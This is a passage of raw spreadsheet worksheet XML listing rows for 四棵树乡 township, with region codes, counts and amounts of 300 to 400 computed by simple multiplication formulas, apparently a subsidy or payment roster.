      <c r="G2469" s="14"/>
      <c r="H2469" s="14"/>
      <c r="I2469" s="14"/>
      <c r="J2469" s="14"/>
      <c r="K2469" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2470" ht="23" customHeight="1" spans="1:11">
      <c r="A2470" s="13" t="s">
        <v>6462</v>
      </c>
      <c r="B2470" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2470" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2470" s="14" t="s">
        <v>6463</v>
      </c>
      <c r="E2470" s="14" t="s">
        <v>6464</v>
      </c>
      <c r="F2470" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2470" s="14">
        <v>1</v>
      </c>
      <c r="H2470" s="14">
        <v>340</v>
      </c>
      <c r="I2470" s="14">
        <f>H2470*G2470</f>
        <v>340</v>
      </c>
      <c r="J2470" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2470" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2471" ht="23" customHeight="1" spans="1:11">
      <c r="A2471" s="13" t="s">
        <v>6466</v>
      </c>
      <c r="B2471" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2471" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2471" s="14" t="s">
        <v>6467</v>
      </c>
      <c r="E2471" s="14" t="s">
        <v>6468</v>
      </c>
      <c r="F2471" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2471" s="14">
        <v>1</v>
      </c>
      <c r="H2471" s="14">
        <v>340</v>
      </c>
      <c r="I2471" s="14">
        <f>H2471*G2471</f>
        <v>340</v>
      </c>
      <c r="J2471" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2471" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2472" ht="23" customHeight="1" spans="1:11">
      <c r="A2472" s="13" t="s">
        <v>6469</v>
      </c>
      <c r="B2472" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2472" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2472" s="14" t="s">
        <v>6470</v>
      </c>
      <c r="E2472" s="14" t="s">
        <v>2195</v>
      </c>
      <c r="F2472" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2472" s="14">
        <v>2</v>
      </c>
      <c r="H2472" s="14">
        <v>300</v>
      </c>
      <c r="I2472" s="14">
        <f>H2472*G2472</f>
        <v>600</v>
      </c>
      <c r="J2472" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2472" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2473" ht="23" customHeight="1" spans="1:11">
      <c r="A2473" s="13" t="s">
        <v>6471</v>
      </c>
      <c r="B2473" s="14" t="str">
        <f>B2472</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2473" s="14" t="str">
        <f>C2472</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2473" s="79" t="s">
        <v>6472</v>
      </c>
      <c r="E2473" s="79" t="s">
        <v>6473</v>
      </c>
      <c r="F2473" s="14" t="str">
        <f>F2472</f>
        <v>4113211125</v>
      </c>
      <c r="G2473" s="14"/>
      <c r="H2473" s="14"/>
      <c r="I2473" s="14"/>
      <c r="J2473" s="14"/>
      <c r="K2473" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2474" ht="23" customHeight="1" spans="1:11">
      <c r="A2474" s="13" t="s">
        <v>6474</v>
      </c>
      <c r="B2474" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2474" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2474" s="14" t="s">
        <v>6475</v>
      </c>
      <c r="E2474" s="14" t="s">
        <v>6456</v>
      </c>
      <c r="F2474" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2474" s="14">
        <v>1</v>
      </c>
      <c r="H2474" s="14">
        <v>340</v>
      </c>
      <c r="I2474" s="14">
        <f>H2474*G2474</f>
        <v>340</v>
      </c>
      <c r="J2474" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2474" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2475" ht="23" customHeight="1" spans="1:11">
      <c r="A2475" s="13" t="s">
        <v>6476</v>
      </c>
      <c r="B2475" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2475" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2475" s="14" t="s">
        <v>6477</v>
      </c>
      <c r="E2475" s="14" t="s">
        <v>6478</v>
      </c>
      <c r="F2475" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2475" s="14">
        <v>1</v>
      </c>
      <c r="H2475" s="14">
        <v>340</v>
      </c>
      <c r="I2475" s="14">
        <f>H2475*G2475</f>
        <v>340</v>
      </c>
      <c r="J2475" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2475" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2476" ht="23" customHeight="1" spans="1:11">
      <c r="A2476" s="13" t="s">
        <v>6479</v>
      </c>
      <c r="B2476" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2476" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2476" s="14" t="s">
        <v>6480</v>
      </c>
      <c r="E2476" s="14" t="s">
        <v>6401</v>
      </c>
      <c r="F2476" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2476" s="14">
        <v>2</v>
      </c>
      <c r="H2476" s="14">
        <v>300</v>
      </c>
      <c r="I2476" s="14">
        <f>H2476*G2476</f>
        <v>600</v>
      </c>
      <c r="J2476" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2476" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2477" ht="23" customHeight="1" spans="1:11">
      <c r="A2477" s="13" t="s">
        <v>6481</v>
      </c>
      <c r="B2477" s="14" t="str">
        <f>B2476</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2477" s="14" t="str">
        <f>C2476</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2477" s="79" t="s">
        <v>6482</v>
      </c>
      <c r="E2477" s="79" t="s">
        <v>6483</v>
      </c>
      <c r="F2477" s="14" t="str">
        <f>F2476</f>
        <v>4113211125</v>
      </c>
      <c r="G2477" s="14"/>
      <c r="H2477" s="14"/>
      <c r="I2477" s="14"/>
      <c r="J2477" s="14"/>
      <c r="K2477" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2478" ht="23" customHeight="1" spans="1:11">
      <c r="A2478" s="13" t="s">
        <v>6484</v>
      </c>
      <c r="B2478" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2478" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2478" s="14" t="s">
        <v>6485</v>
      </c>
      <c r="E2478" s="14" t="s">
        <v>6429</v>
      </c>
      <c r="F2478" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2478" s="14">
        <v>1</v>
      </c>
      <c r="H2478" s="14">
        <v>340</v>
      </c>
      <c r="I2478" s="14">
        <f>H2478*G2478</f>
        <v>340</v>
      </c>
      <c r="J2478" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2478" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2479" ht="23" customHeight="1" spans="1:11">
      <c r="A2479" s="13" t="s">
        <v>6486</v>
      </c>
      <c r="B2479" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2479" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2479" s="14" t="s">
        <v>6487</v>
      </c>
      <c r="E2479" s="14" t="s">
        <v>6488</v>
      </c>
      <c r="F2479" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2479" s="14">
        <v>1</v>
      </c>
      <c r="H2479" s="14">
        <v>340</v>
      </c>
      <c r="I2479" s="14">
        <f>H2479*G2479</f>
        <v>340</v>
      </c>
      <c r="J2479" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2479" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2480" ht="23" customHeight="1" spans="1:11">
      <c r="A2480" s="13" t="s">
        <v>6489</v>
      </c>
      <c r="B2480" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2480" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2480" s="14" t="s">
        <v>6416</v>
      </c>
      <c r="E2480" s="14" t="s">
        <v>6490</v>
      </c>
      <c r="F2480" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2480" s="14">
        <v>2</v>
      </c>
      <c r="H2480" s="14">
        <v>300</v>
      </c>
      <c r="I2480" s="14">
        <f>H2480*G2480</f>
        <v>600</v>
      </c>
      <c r="J2480" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2480" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2481" ht="23" customHeight="1" spans="1:11">
      <c r="A2481" s="13" t="s">
        <v>6491</v>
      </c>
      <c r="B2481" s="14" t="str">
        <f>B2480</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2481" s="14" t="str">
        <f>C2480</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2481" s="18" t="s">
        <v>6492</v>
      </c>
      <c r="E2481" s="19" t="s">
        <v>6493</v>
      </c>
      <c r="F2481" s="14" t="str">
        <f>F2480</f>
        <v>4113211125</v>
      </c>
      <c r="G2481" s="14"/>
      <c r="H2481" s="14"/>
      <c r="I2481" s="14"/>
      <c r="J2481" s="14"/>
      <c r="K2481" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2482" ht="23" customHeight="1" spans="1:11">
      <c r="A2482" s="13" t="s">
        <v>6494</v>
      </c>
      <c r="B2482" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2482" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2482" s="14" t="s">
        <v>6495</v>
      </c>
      <c r="E2482" s="14" t="s">
        <v>6496</v>
      </c>
      <c r="F2482" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2482" s="14">
        <v>1</v>
      </c>
      <c r="H2482" s="14">
        <v>340</v>
      </c>
      <c r="I2482" s="14">
        <f>H2482*G2482</f>
        <v>340</v>
      </c>
      <c r="J2482" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2482" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2483" ht="23" customHeight="1" spans="1:11">
      <c r="A2483" s="13" t="s">
        <v>6497</v>
      </c>
      <c r="B2483" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2483" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2483" s="14" t="s">
        <v>6498</v>
      </c>
      <c r="E2483" s="14" t="s">
        <v>6499</v>
      </c>
      <c r="F2483" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2483" s="14">
        <v>2</v>
      </c>
      <c r="H2483" s="14">
        <v>300</v>
      </c>
      <c r="I2483" s="14">
        <f>H2483*G2483</f>
        <v>600</v>
      </c>
      <c r="J2483" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2483" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2484" ht="23" customHeight="1" spans="1:11">
      <c r="A2484" s="13" t="s">
        <v>6500</v>
      </c>
      <c r="B2484" s="14" t="str">
        <f>B2483</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2484" s="14" t="str">
        <f>C2483</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2484" s="79" t="s">
        <v>6501</v>
      </c>
      <c r="E2484" s="79" t="s">
        <v>2195</v>
      </c>
      <c r="F2484" s="14" t="str">
        <f>F2483</f>
        <v>4113211125</v>
      </c>
      <c r="G2484" s="14"/>
      <c r="H2484" s="14"/>
      <c r="I2484" s="14"/>
      <c r="J2484" s="14"/>
      <c r="K2484" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2485" ht="23" customHeight="1" spans="1:11">
      <c r="A2485" s="13" t="s">
        <v>6502</v>
      </c>
      <c r="B2485" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2485" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2485" s="14" t="s">
        <v>6503</v>
      </c>
      <c r="E2485" s="14" t="s">
        <v>496</v>
      </c>
      <c r="F2485" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2485" s="14">
        <v>2</v>
      </c>
      <c r="H2485" s="14">
        <v>300</v>
      </c>
      <c r="I2485" s="14">
        <f>H2485*G2485</f>
        <v>600</v>
      </c>
      <c r="J2485" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2485" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2486" ht="23" customHeight="1" spans="1:11">
      <c r="A2486" s="13" t="s">
        <v>6504</v>
      </c>
      <c r="B2486" s="14" t="str">
        <f>B2485</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2486" s="14" t="str">
        <f>C2485</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2486" s="79" t="s">
        <v>6505</v>
      </c>
      <c r="E2486" s="79" t="s">
        <v>6490</v>
      </c>
      <c r="F2486" s="14" t="str">
        <f>F2485</f>
        <v>4113211125</v>
      </c>
      <c r="G2486" s="14"/>
      <c r="H2486" s="14"/>
      <c r="I2486" s="14"/>
      <c r="J2486" s="14"/>
      <c r="K2486" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2487" ht="23" customHeight="1" spans="1:11">
      <c r="A2487" s="13" t="s">
        <v>6506</v>
      </c>
      <c r="B2487" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2487" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2487" s="14" t="s">
        <v>6507</v>
      </c>
      <c r="E2487" s="14" t="s">
        <v>6420</v>
      </c>
      <c r="F2487" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2487" s="14">
        <v>2</v>
      </c>
      <c r="H2487" s="14">
        <v>300</v>
      </c>
      <c r="I2487" s="14">
        <f>H2487*G2487</f>
        <v>600</v>
      </c>
      <c r="J2487" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2487" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2488" ht="23" customHeight="1" spans="1:11">
      <c r="A2488" s="13" t="s">
        <v>6508</v>
      </c>
      <c r="B2488" s="14" t="str">
        <f>B2487</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2488" s="14" t="str">
        <f>C2487</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2488" s="79" t="s">
        <v>6509</v>
      </c>
      <c r="E2488" s="79" t="s">
        <v>1362</v>
      </c>
      <c r="F2488" s="14" t="str">
        <f>F2487</f>
        <v>4113211125</v>
      </c>
      <c r="G2488" s="14"/>
      <c r="H2488" s="14"/>
      <c r="I2488" s="14"/>
      <c r="J2488" s="14"/>
      <c r="K2488" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2489" ht="23" customHeight="1" spans="1:11">
      <c r="A2489" s="13" t="s">
        <v>6510</v>
      </c>
      <c r="B2489" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2489" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2489" s="14" t="s">
        <v>6511</v>
      </c>
      <c r="E2489" s="14" t="s">
        <v>6512</v>
      </c>
      <c r="F2489" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2489" s="14">
        <v>1</v>
      </c>
      <c r="H2489" s="14">
        <v>340</v>
      </c>
      <c r="I2489" s="14">
        <f>H2489*G2489</f>
        <v>340</v>
      </c>
      <c r="J2489" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2489" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2490" ht="23" customHeight="1" spans="1:11">
      <c r="A2490" s="13" t="s">
        <v>6513</v>
      </c>
      <c r="B2490" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2490" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2490" s="14" t="s">
        <v>6514</v>
      </c>
      <c r="E2490" s="14" t="s">
        <v>6515</v>
      </c>
      <c r="F2490" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2490" s="14">
        <v>1</v>
      </c>
      <c r="H2490" s="14">
        <v>340</v>
      </c>
      <c r="I2490" s="14">
        <f>H2490*G2490</f>
        <v>340</v>
      </c>
      <c r="J2490" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2490" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2491" ht="23" customHeight="1" spans="1:11">
      <c r="A2491" s="13" t="s">
        <v>6516</v>
      </c>
      <c r="B2491" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2491" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2491" s="14" t="s">
        <v>6517</v>
      </c>
      <c r="E2491" s="14" t="s">
        <v>6518</v>
      </c>
      <c r="F2491" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2491" s="14">
        <v>2</v>
      </c>
      <c r="H2491" s="14">
        <v>300</v>
      </c>
      <c r="I2491" s="14">
        <f>H2491*G2491</f>
        <v>600</v>
      </c>
      <c r="J2491" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2491" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2492" ht="23" customHeight="1" spans="1:11">
      <c r="A2492" s="13" t="s">
        <v>6519</v>
      </c>
      <c r="B2492" s="14" t="str">
        <f>B2491</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2492" s="14" t="str">
        <f>C2491</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2492" s="79" t="s">
        <v>6520</v>
      </c>
      <c r="E2492" s="79" t="s">
        <v>6395</v>
      </c>
      <c r="F2492" s="14" t="str">
        <f>F2491</f>
        <v>4113211124</v>
      </c>
      <c r="G2492" s="14"/>
      <c r="H2492" s="14"/>
      <c r="I2492" s="14"/>
      <c r="J2492" s="14"/>
      <c r="K2492" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2493" ht="23" customHeight="1" spans="1:11">
      <c r="A2493" s="13" t="s">
        <v>6521</v>
      </c>
      <c r="B2493" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2493" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2493" s="14" t="s">
        <v>6522</v>
      </c>
      <c r="E2493" s="14" t="s">
        <v>6448</v>
      </c>
      <c r="F2493" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2493" s="14">
        <v>1</v>
      </c>
      <c r="H2493" s="14">
        <v>400</v>
      </c>
      <c r="I2493" s="14">
        <f t="shared" ref="I2493:I2508" si="116">H2493*G2493</f>
        <v>400</v>
      </c>
      <c r="J2493" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2493" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2494" ht="23" customHeight="1" spans="1:11">
      <c r="A2494" s="13" t="s">
        <v>6523</v>
      </c>
      <c r="B2494" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2494" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2494" s="14" t="s">
        <v>6524</v>
      </c>
      <c r="E2494" s="14" t="s">
        <v>6525</v>
      </c>
      <c r="F2494" s="14" t="s">
        <v>6526</v>
      </c>
      <c r="G2494" s="14">
        <v>1</v>
      </c>
      <c r="H2494" s="14">
        <v>340</v>
      </c>
      <c r="I2494" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2494" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2494" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2495" ht="23" customHeight="1" spans="1:11">
      <c r="A2495" s="13" t="s">
        <v>6527</v>
      </c>
      <c r="B2495" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2495" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2495" s="14" t="s">
        <v>6528</v>
      </c>
      <c r="E2495" s="14" t="s">
        <v>6404</v>
      </c>
      <c r="F2495" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2495" s="14">
        <v>1</v>
      </c>
      <c r="H2495" s="14">
        <v>340</v>
      </c>
      <c r="I2495" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2495" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2495" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2496" ht="23" customHeight="1" spans="1:11">
      <c r="A2496" s="13" t="s">
        <v>6529</v>
      </c>
      <c r="B2496" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2496" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2496" s="14" t="s">
        <v>6530</v>
      </c>
      <c r="E2496" s="14" t="s">
        <v>6398</v>
      </c>
      <c r="F2496" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2496" s="14">
        <v>1</v>
      </c>
      <c r="H2496" s="14">
        <v>340</v>
      </c>
      <c r="I2496" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2496" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2496" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2497" ht="23" customHeight="1" spans="1:11">
      <c r="A2497" s="13" t="s">
        <v>6531</v>
      </c>
      <c r="B2497" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2497" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2497" s="14" t="s">
        <v>6532</v>
      </c>
      <c r="E2497" s="14" t="s">
        <v>6533</v>
      </c>
      <c r="F2497" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2497" s="14">
        <v>1</v>
      </c>
      <c r="H2497" s="14">
        <v>340</v>
      </c>
      <c r="I2497" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2497" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2497" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2498" ht="23" customHeight="1" spans="1:11">
      <c r="A2498" s="13" t="s">
        <v>6534</v>
      </c>
      <c r="B2498" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2498" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2498" s="14" t="s">
        <v>6535</v>
      </c>
      <c r="E2498" s="14" t="s">
        <v>3897</v>
      </c>
      <c r="F2498" s="14" t="s">
        <v>6526</v>
      </c>
      <c r="G2498" s="14">
        <v>1</v>
      </c>
      <c r="H2498" s="14">
        <v>340</v>
      </c>
      <c r="I2498" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2498" s="14" t="s">
        <v>6176</v>
      </c>
      <c r="K2498" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2499" ht="23" customHeight="1" spans="1:11">
      <c r="A2499" s="13" t="s">
        <v>6536</v>
      </c>
      <c r="B2499" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2499" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2499" s="14" t="s">
        <v>6537</v>
      </c>
      <c r="E2499" s="14" t="s">
        <v>6538</v>
      </c>
      <c r="F2499" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2499" s="14">
        <v>1</v>
      </c>
      <c r="H2499" s="14">
        <v>340</v>
      </c>
      <c r="I2499" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2499" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2499" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2500" ht="23" customHeight="1" spans="1:11">
      <c r="A2500" s="13" t="s">
        <v>6539</v>
      </c>
      <c r="B2500" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2500" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2500" s="14" t="s">
        <v>6540</v>
      </c>
      <c r="E2500" s="14" t="s">
        <v>6395</v>
      </c>
      <c r="F2500" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2500" s="14">
        <v>1</v>
      </c>
      <c r="H2500" s="14">
        <v>340</v>
      </c>
      <c r="I2500" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2500" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2500" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2501" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2501" s="13" t="s">
        <v>6541</v>
      </c>
      <c r="B2501" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2501" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2501" s="14" t="s">
        <v>6542</v>
      </c>
      <c r="E2501" s="14" t="s">
        <v>496</v>
      </c>
      <c r="F2501" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2501" s="14">
        <v>1</v>
      </c>
      <c r="H2501" s="14">
        <v>340</v>
      </c>
      <c r="I2501" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2501" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2501" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2502" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2502" s="13" t="s">
        <v>6543</v>
      </c>
      <c r="B2502" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2502" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2502" s="14" t="s">
        <v>6544</v>
      </c>
      <c r="E2502" s="14" t="s">
        <v>6545</v>
      </c>
      <c r="F2502" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2502" s="14">
        <v>1</v>
      </c>
      <c r="H2502" s="14">
        <v>340</v>
      </c>
      <c r="I2502" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2502" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2502" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2503" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2503" s="13" t="s">
        <v>6546</v>
      </c>
      <c r="B2503" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2503" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D2503" s="14" t="s">
        <v>6547</v>
      </c>
      <c r="E2503" s="14" t="s">
        <v>6548</v>
      </c>
      <c r="F2503" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2503" s="14">
        <v>1</v>
      </c>
      <c r="H2503" s="14">
        <v>340</v>
      </c>
      <c r="I2503" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2503" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2503" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2504" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2504" s="13" t="s">
        <v>6549</v>
      </c>
      <c r="B2504" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2504" s="14" t="s">
        <v>6550</v>
      </c>
      <c r="D2504" s="14" t="s">
        <v>6551</v>
      </c>
      <c r="E2504" s="14" t="s">
        <v>6552</v>
      </c>
      <c r="F2504" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2504" s="14">
        <v>1</v>
      </c>
      <c r="H2504" s="14">
        <v>340</v>
      </c>
      <c r="I2504" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2504" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2504" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2505" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2505" s="13" t="s">
        <v>6553</v>
      </c>
      <c r="B2505" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2505" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2505" s="14" t="s">
        <v>6554</v>
      </c>
      <c r="E2505" s="14" t="s">
        <v>6555</v>
      </c>
      <c r="F2505" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2505" s="14">
        <v>1</v>
      </c>
      <c r="H2505" s="14">
        <v>340</v>
      </c>
      <c r="I2505" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2505" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2505" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2506" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2506" s="13" t="s">
        <v>6556</v>
      </c>
      <c r="B2506" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2506" s="14" t="s">
        <v>6257</v>
      </c>
      <c r="D2506" s="14" t="s">
        <v>6557</v>
      </c>
      <c r="E2506" s="14" t="s">
        <v>6558</v>
      </c>
      <c r="F2506" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2506" s="14">
        <v>1</v>
      </c>
      <c r="H2506" s="14">
        <v>340</v>
      </c>
      <c r="I2506" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2506" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2506" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2507" s="6" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2507" s="13" t="s">
        <v>6559</v>
      </c>
      <c r="B2507" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2507" s="14" t="s">
        <v>3560</v>
      </c>
      <c r="D2507" s="14" t="s">
        <v>6560</v>
      </c>
      <c r="E2507" s="14" t="s">
        <v>6561</v>
      </c>
      <c r="F2507" s="14" t="s">
        <v>6465</v>
      </c>
      <c r="G2507" s="14">
        <v>1</v>
      </c>
      <c r="H2507" s="14">
        <v>340</v>
      </c>
      <c r="I2507" s="14">
        <f t="shared" si="116"/>
        <v>340</v>
      </c>
      <c r="J2507" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2507" s="14" t="s">
        <v>225</v>
